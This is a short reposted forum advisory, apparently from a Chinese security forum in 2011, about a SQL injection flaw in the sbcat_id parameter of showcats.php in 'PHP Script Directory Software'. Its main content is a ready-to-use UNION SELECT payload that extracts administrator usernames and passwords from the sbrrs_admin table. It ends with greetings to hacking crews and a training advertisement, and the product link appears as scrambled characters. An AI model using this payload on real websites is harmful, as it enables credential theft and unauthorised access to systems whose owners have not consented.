-
-
[转帖]PHP Script Directory Software (sbcat_id) SQL Injection Vulnerability
-
发表于:
2011-1-29 07:50
2817
-
[转帖]PHP Script Directory Software (sbcat_id) SQL Injection Vulnerability
Script: PHP script directory software
Version: n/a
Link:
e8bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4G2k6Y4c8T1K9i4A6K6L8$3I4#2N6r3W2G2L8Y4y4Q4x3X3g2U0L8$3#2Q4x3V1k6K6j5%4u0A6M7s2c8Q4x3X3c8V1K9i4u0W2j5%4c8G2M7Y4W2Q4x3X3c8K6L8$3k6@1N6$3q4J5k6g2)9J5k6i4m8Z5M7l9`.`.
==
3xploit:
[path]/showcats.php?sbcat_id=[SQL-Injection]
3xample:
[path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(sbadmin_name,0x3a,sbadmin_pwd),3,4,5+from+sbrrs_admin--
==
Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
